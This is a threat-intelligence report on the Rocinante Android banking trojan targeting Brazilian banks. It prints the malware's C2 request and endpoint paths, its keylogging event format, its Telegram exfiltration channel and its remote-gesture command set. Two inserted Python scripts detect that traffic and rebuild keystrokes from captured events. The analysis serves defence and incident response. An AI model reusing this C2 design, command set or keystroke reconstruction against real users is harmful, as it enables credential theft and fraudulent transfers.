
Rocinante: The trojan horse that wanted to fly

28 August 2024

Introduction

The mobile malware landscape has been continuously evolving over the last few years, with many new actors joining a field that has been growing for almost a decade. The introduction of simple and instant transactions via mobile devices attracted a myriad of new actors to this landscape.

Recently, we identified a new strain of malware originating from Brazil that embodies this new wave of bankers. We call it Rocinante.

This malware family performs keylogging through the Accessibility Service and steals PII from its victims with phishing screens posing as different banks. Finally, it can use the exfiltrated information to perform Device Takeover (DTO), leveraging its Accessibility Service privileges to obtain full remote access to the infected device.

Key Takeaways

  • Rocinante is active in Brazil and targets the majority of banking institutions from this region
  • Rocinante is able to perform Keylogging, phishing attacks, and Remote Access Sessions on an infected device
  • Rocinante uses a combination of Firebase messaging, HTTP traffic, WebSocket traffic, and the Telegram API to register the infected device, exfiltrate information, and perform Device Takeover
  • The authors of Rocinante are influenced by developments in the threat landscape in other regions, adding parts of the source code of Ermac / Hook to their implementation

Rocinante or Pegasus?

It is clear from the names of the Telegram bots used to collect the PII stolen by the malware, and from the C2 endpoint paths used by the samples, that the actors behind this malware family refer to the bot as "Pegasus" or "PegasusSpy" internally.

[Figure: Telegram bot names and C2 paths referring to "Pegasus"]

Adopting this name for the malware would be very confusing however. There is a very infamous Spyware family already called "Pegasus", developed by the NSO Group, which has been used to track and spy on journalists, lawyers, political dissidents, and human rights activists.

We want to clarify that the malware family discussed here has no ties to that existing family and, although it does provide clear information about the victim, its capabilities as spyware are far inferior to those of NSO Group's Pegasus. Its targeting of Brazilian banking institutions for financial gain also clearly sets it apart from the existing Pegasus.

Considering the misunderstanding and confusion that would arise from adopting the name used by the actors behind this malware family, ThreatFabric analysts decided to assign another name to this malware family.

We will refer to this malware family in this article as "Rocinante", from the name of Don Quixote's horse. Just like its literary owner, Rocinante is aspiring to be something it is not, in this case a mythological winged horse.


DTO malware targeting Brazil

Rocinante falls in line with most malware families targeting Brazil that we have analysed over the past few years. Elsewhere, banking malware usually retrieves its target list dynamically from a C2 server. This gives the criminals more flexibility: the same malware can be used with different targets in different geographical regions, and a campaign can be temporarily "shut off" simply by taking the C2 server offline.

This is not usually the case with malware distributed in Brazil. There are many possible reasons for this difference in behaviour. The most likely is that the criminals design the malware for the local market and are not interested in expanding their reach outside the region. With that in mind, there is no need to introduce dynamic targets: in Rocinante, the targets are embedded in the sample itself.

ThreatFabric identified a handful of different campaigns, with samples posing as security updates, courier applications, rewards applications, and even banking applications:

[Figure: observed Rocinante campaigns and their app names]

The main distribution mechanism is phishing websites that trick the user into installing the malicious APK, which poses as a security solution or as a banking institution's app.

Targets

The latest list of targets that we were able to obtain from these samples includes institutions that together hold the majority of the Brazilian market share, offering criminals a very large potential victim base.

Once the victim opens the application and grants it the Accessibility Service permission, they are presented with a choice screen. Each choice triggers a different phishing page asking the victim for their PII (each login page differs slightly depending on the bank the malware is posing as).

Here are some of the phishing screens shown to the victim:

[Figure: phishing screens posing as the targeted banks]

The full list of targets from all the samples tracked is reported in the IOC section, at the end of this article.


Features and Capabilities

[Figure: overview of Rocinante's capabilities]

C2 communication

Rocinante utilizes a combination of multiple different protocols and services to communicate information from the infected device.

Below are the protocols used:

Protocol            Usage
Firebase messaging  Registers the installation and returns the installation token that is later paired with the WebSocket ID
HTTP                Used to obtain the initial token from Firebase, set up the WebSocket communication, and correlate with the secondary C2
WebSocket           Used to communicate keylogging results and receive commands from the C2
Telegram Bot API    Used to deliver the PII harvested by the phishing screens to a chat the operators control


The very first communication is directed at the Firebase messaging server, which registers the installation of the bot on the infected device and returns a token that will later be used in communication with one of the C2 servers.

This token is used to correlate the unique ID used in the WebSocket communication with a specific installation of the malware.

The malware then contacts its first-stage C2 server. This is done via a simple HTTP GET request asking to upgrade the connection to the WebSocket protocol. Once the WebSocket is established, the bot starts sending keylogging data over it and at the same time waits for commands to execute.

The malware also utilises a third C2 server, which is used to communicate the installation token received from Firebase and correlate it with the ID used in the WebSocket communication:

GET /api/v1/Pegasus/InserirAtualizarToken?idUser=<WebSocketID>&Token=<FirebaseInstallationToken> HTTP/1.1
Host: <C2_Address>
Accept-Encoding: gzip, deflate, br
User-Agent: okhttp/4.9.2
Connection: keep-alive

From this URL we can also confirm that the naming used by criminals for this malware is indeed Pegasus.

The code base also contains other reachable paths that do not seem to be used at present. Based on the code and the path names, we can infer their intended usage, which we record here for future reference:

Endpoint                                 Description
/api/v1/Pegasus/InserirBase64            Send JSON in Base64 encoding
/api/v1/Pegasus/InserirObjeto            Send JSON
/api/v1/Pegasus/RecuperarComando         Receive a command
/api/v1/Pegasus/DeletarComando           Delete a specific command for an ID
/api/v1/Pegasus/DeletarComandoTodos      Delete all commands for an ID
/api/v1/Pegasus/InserirAtualizarToken    Pair a client ID with an installation token
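To make the HTTP side of this concrete, here is an added example (not ThreatFabric's tooling and not code from the malware) that triages captured requests: it flags the /api/v1/Pegasus/ endpoints listed above and pulls the WebSocket ID and Firebase token out of the pairing call, recognises the GET that upgrades to the WebSocket channel, and spots calls to the Telegram Bot API (host api.telegram.org, path /bot<token>/<method>) that carries the exfiltrated PII mentioned in the key takeaways. The hostnames, the idUser / Token values and the bot token in the sample requests are constructed placeholders; the okhttp/4.9.2 User-Agent is the one shown in the request above.

```python
"""Triage captured HTTP requests for Rocinante ("Pegasus") C2 traffic.

Added example, not ThreatFabric's tooling. Hostnames and identifier values
in the sample requests are constructed placeholders.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Endpoint paths present in the samples (see the endpoint table above).
PEGASUS_ENDPOINTS = {
    "/api/v1/Pegasus/InserirBase64": "send JSON, base64-encoded",
    "/api/v1/Pegasus/InserirObjeto": "send JSON",
    "/api/v1/Pegasus/RecuperarComando": "receive a command",
    "/api/v1/Pegasus/DeletarComando": "delete one command for an ID",
    "/api/v1/Pegasus/DeletarComandoTodos": "delete all commands for an ID",
    "/api/v1/Pegasus/InserirAtualizarToken": "pair WebSocket ID with Firebase token",
}
# Telegram Bot API paths are /bot<token>/<method>; a token is <bot id>:<secret>.
TELEGRAM_PATH_RE = re.compile(r"^/bot(\d+:[A-Za-z0-9_-]+)/([A-Za-z]+)$")


@dataclass
class Hit:
    kind: str            # "pegasus-c2", "websocket-upgrade" or "telegram-bot-api"
    host: str
    path: str
    details: Dict[str, str] = field(default_factory=dict)


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP/1.1 request head into (method, target, headers).
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target = (request_line.split(" ") + ["", ""])[:2]
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, target, headers


def triage(raw: str) -> Optional[Hit]:
    """Classify one request; None when nothing Rocinante-like is present."""
    method, target, headers = parse_request(raw)
    host = headers.get("host", "")
    url = urlsplit(target)
    query = parse_qs(url.query)

    if url.path in PEGASUS_ENDPOINTS:
        details = {"purpose": PEGASUS_ENDPOINTS[url.path], "method": method}
        if url.path.endswith("/InserirAtualizarToken"):
            # The pairing call carries both identifiers in the query string.
            details["ws_id"] = query.get("idUser", [""])[0]
            details["firebase_token"] = query.get("Token", [""])[0]
        return Hit("pegasus-c2", host, url.path, details)

    if headers.get("upgrade", "").lower() == "websocket":
        return Hit("websocket-upgrade", host, url.path,
                   {"user_agent": headers.get("user-agent", "")})

    m = TELEGRAM_PATH_RE.match(url.path)
    if host == "api.telegram.org" and m:
        # Bot token and API method (e.g. sendMessage) identify the operators' bot.
        return Hit("telegram-bot-api", host, url.path,
                   {"bot_token": m.group(1), "api_method": m.group(2)})
    return None


def triage_all(requests: List[str]) -> List[Hit]:
    return [h for h in (triage(r) for r in requests) if h is not None]


# Constructed sample traffic (hosts and identifiers are placeholders).
TOKEN_PAIRING = "\r\n".join([
    "GET /api/v1/Pegasus/InserirAtualizarToken?idUser=ws-0001&Token=fb-installation-token HTTP/1.1",
    "Host: c2.example.invalid", "User-Agent: okhttp/4.9.2", "", ""])
WS_UPGRADE = "\r\n".join([
    "GET /ws HTTP/1.1", "Host: ws.example.invalid", "Upgrade: websocket",
    "Connection: Upgrade", "User-Agent: okhttp/4.9.2", "", ""])
TELEGRAM_POST = "\r\n".join([
    "POST /bot123456:CONSTRUCTED_TOKEN/sendMessage HTTP/1.1", "Host: api.telegram.org",
    "Content-Type: application/x-www-form-urlencoded", "", "chat_id=-1001&text=hello"])
BENIGN = "GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n"

if __name__ == "__main__":
    for hit in triage_all([TOKEN_PAIRING, WS_UPGRADE, TELEGRAM_POST, BENIGN]):
        print(hit.kind, hit.host, hit.path, hit.details)
```

The same matching can be applied to proxy or NetFlow-derived HTTP logs. The InserirAtualizarToken hit is the most useful one for incident response, because its two identifiers tie a WebSocket session to a specific Firebase installation and therefore to a specific infected device.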


Keylogging, Phishing screens, and Exfiltration

Once the Accessibility Service privileges are granted, the malware starts actively logging everything that happens on the device.

Every time an accessibility event fires, that is, whenever anything changes on the UI, Rocinante logs in detail everything that is shown to the user.

Each logged event is sent over the WebSocket channel in the following format:

{
   "top": <Coordinates from the top>,
   "bottom": <Coordinates from the bottom>,
   "left": <Coordinates from the left>,
   "right": <Coordinates from the right>,
   "centerX": <X Coordinates of the center of the element>,
   "centerY": <Y Coordinates of the center of the element>,
   "width": <Width>,
   "height": <Height>,
   "exactCenterX": <Exact X Coordinates of the center of the element>,
   "exactCenterY": <Exact Y Coordinates of the center of the element>,
   "text": <Text contained in the element>,
   "packageName": <Package name>,
   "className": <Class name>,
   "Visible": <Is the element visible>,
   "Focus": <Is the focus of the OS on this element>,
   "Password": <Is it a password Field>,
   "des": <Description of the text>,
   "clickable": <Is the element clickable>,
   "Enabled": <Is the element enabled>,
   "Checked": <Is the element checked>
}

In this way, the actors can effectively log any action or information that is shown to the victim on the screen of the infected device.
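As an added example (not the malware's code and not a ThreatFabric tool), the following script shows what an analyst can recover from a capture of this channel: it folds the per-event UI dumps into the final contents of each focused input field and derives the keystrokes implied by successive text values, which is what turns a generic UI logger into a credential keylogger. The sample frames, the package name br.com.example.bank and the screen coordinates are constructed; whether a Password field's text is delivered masked or in clear depends on the app and the Android version.

```python
"""Rebuild input-field contents from Rocinante's WebSocket UI events.

Added example, not code from the malware or from ThreatFabric. It consumes
JSON objects in the format shown above, one per WebSocket frame, and keeps,
per focused input element, the text the victim ended up with plus the
keystrokes implied by successive text values. The sample frames, package
name and screen coordinates are constructed.
"""
import json
from collections import OrderedDict
from typing import Iterable, List

# Widgets the user types into (the article names EditText and
# MultiAutoCompleteTextView as the ones Rocinante also edits remotely).
INPUT_CLASS_SUFFIXES = ("EditText", "AutoCompleteTextView")


def diff_text(old: str, new: str) -> List[str]:
    """Keystrokes implied by one text change on the same field: appended
    characters, one "<BS>" per trimmed character, or a full replacement."""
    if new.startswith(old):
        return list(new[len(old):])
    if old.startswith(new):
        return ["<BS>"] * (len(old) - len(new))
    return ["<SET:%s>" % new]


def reconstruct_fields(events: Iterable[dict]) -> "OrderedDict":
    """Fold the stream into the final state of each focused input. Elements
    are identified by package, class and centre position, which is all the
    malware's event format provides."""
    fields = OrderedDict()
    for ev in events:
        cls = ev.get("className", "")
        if not ev.get("Focus") or not cls.endswith(INPUT_CLASS_SUFFIXES):
            continue                       # labels, buttons, unfocused inputs
        key = (ev.get("packageName", ""), cls, ev.get("centerX"), ev.get("centerY"))
        entry = fields.setdefault(key, {"text": "", "keys": [], "hint": ev.get("des") or "",
                                        "password": bool(ev.get("Password"))})
        new_text = ev.get("text") or ""
        if new_text != entry["text"]:
            entry["keys"].extend(diff_text(entry["text"], new_text))
            entry["text"] = new_text
    return fields


def summarize(frames: Iterable[str]) -> List[dict]:
    """Parse one JSON event per frame and return an ordered, flat view."""
    fields = reconstruct_fields(json.loads(f) for f in frames if f.strip())
    return [{"package": pkg, "hint": e["hint"], "password": e["password"],
             "text": e["text"], "keys": e["keys"]}
            for (pkg, _cls, _x, _y), e in fields.items()]


def make_event(text, cx, cy, cls="android.widget.EditText", focus=True,
               password=False, des="", pkg="br.com.example.bank"):
    """One event in the malware's field layout (constructed values)."""
    w, h = 600, 120
    return {"top": cy - h // 2, "bottom": cy + h // 2, "left": cx - w // 2,
            "right": cx + w // 2, "centerX": cx, "centerY": cy, "width": w,
            "height": h, "exactCenterX": float(cx), "exactCenterY": float(cy),
            "text": text, "packageName": pkg, "className": cls, "Visible": True,
            "Focus": focus, "Password": password, "des": des,
            "clickable": cls.endswith("Button"), "Enabled": True, "Checked": False}


# Constructed stream: "123" typed into a CPF field, one backspace, then "5";
# three characters into the password field (shown masked here; whether an
# accessibility client sees the clear text depends on the app and OS); then
# an unfocused login button, which the reconstruction ignores.
SAMPLE_FRAMES = [json.dumps(e) for e in [
    make_event("", 540, 800, des="CPF"),
    make_event("1", 540, 800, des="CPF"),
    make_event("12", 540, 800, des="CPF"),
    make_event("123", 540, 800, des="CPF"),
    make_event("12", 540, 800, des="CPF"),
    make_event("125", 540, 800, des="CPF"),
    make_event("", 540, 1000, password=True, des="Senha"),
    make_event("\u2022", 540, 1000, password=True, des="Senha"),
    make_event("\u2022\u2022", 540, 1000, password=True, des="Senha"),
    make_event("\u2022\u2022\u2022", 540, 1000, password=True, des="Senha"),
    make_event("Entrar", 540, 1200, cls="android.widget.Button", focus=False),
]]

if __name__ == "__main__":
    for row in summarize(SAMPLE_FRAMES):
        print(row)
```

Because the malware identifies elements only by package, class and position, the reconstruction keys on the same tuple; if the UI re-lays out between events, a field will appear twice, which is a limitation of the data, not of the script.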

The most valuable information Rocinante obtains, the data entered into the phishing pages, is processed directly on the client side and sent through a different channel. Each Rocinante sample is tied to a Telegram bot whose job is to receive the PII extracted by the malware.

The malware extracts the useful PII entered into the bogus login pages posing as the target banks and publishes it, formatted, to a chat the criminals have access to. The content varies slightly depending on which fake login page was used, and includes device information such as model and telephone number, as well as CPF number, password, or account number:

[Figure: formatted PII as posted to the operators' Telegram chat]

Remote Actions

Another very important piece of Rocinante functionality, and one the criminals are actively developing, is the ability to perform remote actions on the infected device.

By leveraging the Accessibility Service privileges, this banker can simulate touches and gestures and modify the text of EditText and MultiAutoCompleteTextView widgets. This is enough to navigate the UI of the infected device in order to initiate and then authorise fraudulent transactions.

The instructions are received from the C2 server via the WebSocket channel. The gesture commands are listed below; the full set, including the commands that bring up the phishing screens, is in the IOC section at the end of this article:

Commands

Command    Description
touch      Simulates a touch event at the specified coordinates
livemode   Simulates a touch event at the specified coordinates
left       Swipe left
right      Swipe right
up         Swipe up
down       Swipe down

Ermac / Hook influence

Some of the older samples belonging to Rocinante date all the way back to December 2023. In the span of the last 6 months, Rocinante changed a large part of its code base: specifically, the section responsible for taking screenshots of the device's UI and part of the remote actions.

What is interesting is the fact that the previous implementation, present in the early versions of Rocinante, was actually taken from the Ermac family.

This is interesting because it is the first case in which we see a malware family taking advantage of the Ermac / Hook source code leak that happened in 2023. In the past months we have seen a multitude of re-brandings of these families, managed by external actors and sold on hacking forums under different names. However, this is the first case in which an unrelated, original malware family took code from the leak and integrated only part of it into its own code base.

[Figure: Ermac-derived code in an early Rocinante sample]

Newer versions of Rocinante seem to have lost this part of the code. In some parts, the logic has been substituted with an alternative, like in the case of Screenshots, which are achieved in both versions, but with different techniques.

Some parts have been completely removed: this older code also contains the logic responsible for attacks towards cryptocurrency wallets, which is one of the main target groups of Ermac. This part is not present anymore in the more recent versions, while the usage of Telegram as a way to communicate the exfiltrated PII is only present in the latest versions.

It is also possible that these two versions are separate forks of the same initial project. However, we have not seen them being distributed at the same time, so at this time we are unable to prove or disprove either possibility. 

Conclusion

Despite featuring a relatively short list of samples, it is clear that Rocinante is currently under active development and has been already observed in the wild, targeting customers of Brazilian institutions.

With its keylogging, phishing, and remote access capabilities, it poses a significant risk to banking customers as their sensitive financial data, including account numbers, passwords, and transaction details, can be compromised. Once in possession of this information, malicious actors can initiate unauthorised transfers, and drain bank accounts. Additionally, the remote access capability allows attackers to maintain persistent control over the device, monitoring activities and potentially manipulating transactions in real time, further exacerbating the financial risk for unsuspecting customers.

The effort to hybridise this malware strain with code derived from leaked Ermac / Hook sources reveals a newfound curiosity among LATAM cybercriminals towards malicious activity originating outside their geographical area of interest. Historically, threat actors in LATAM primarily focused on the regional threat landscape, exhibiting little interest in external developments. This is also potentially a beginning of our predictions coming true: Ermac / Hook becoming the new “Cerberus” and the basis or source of inspiration for new threat actors and malware families.

Rocinante also serves as an example of the set of capabilities that modern banking malware needs for criminals to carry out fraudulent operations even while the malware is still in development, with the proceeds further enriching the actors and driving development according to their interests.

IOCs

Samples

With Ermac / Hook code

App name             Package name                    SHA-256
Security Protector   com.example.securityprotector   23c51ed174a6014b3207b41a82c2aee0eea16df8fa1cd14c2864fb3307215070

Without Ermac / Hook code

App name             Package name             SHA-256
Livelo Pontos        com.resgatelivelo.cash   64ec090ea5e22648e46651b12569107f94b10c1e8e4635ef42716aaec28fd6bd
Módulo de Segurança  com.viberotion1414.app   a4886346e8bcfd20f6b5131f2440004675cf851fa86fef7594f8096f63eb6a38
Módulo de Segurança  com.viberotion1414.app   a39a3acc18c84624489d91d25c4517097f18bf4cc3bb8282aa2689bcfd860b0f


Full list of targets

Institution

Bradesco

Itau

Banco do Brasil

Caixa Economica Federal

Santander

PicPay

Mercado Pago

Sicoob

PagSeguro

XP Investimentos


Supported Commands

Command    Description
touch      Simulates a touch event at the specified coordinates
livemode   Simulates a touch event at the specified coordinates
left       Swipe left
right      Swipe right
up         Swipe up
down       Swipe down
aov        Set screen to phishing screen
aov2       Set screen to phishing screen
aov3       Set screen to phishing screen
overpic    Set screen to phishing screen for PicPay
overbra    Set screen to phishing screen for Bradesco
overmp     Set screen to phishing screen for Mercado Pago
overps     Set screen to phishing screen for PagSeguro
oversic    Set screen to phishing screen for Sicoob
overcai    Set screen to phishing screen for Caixa Econômica Federal
oversant   Set screen to phishing screen for Santander BR
overxp     Set screen to phishing screen for XP Investimentos
overlay    Set screen to a generic phishing overlay
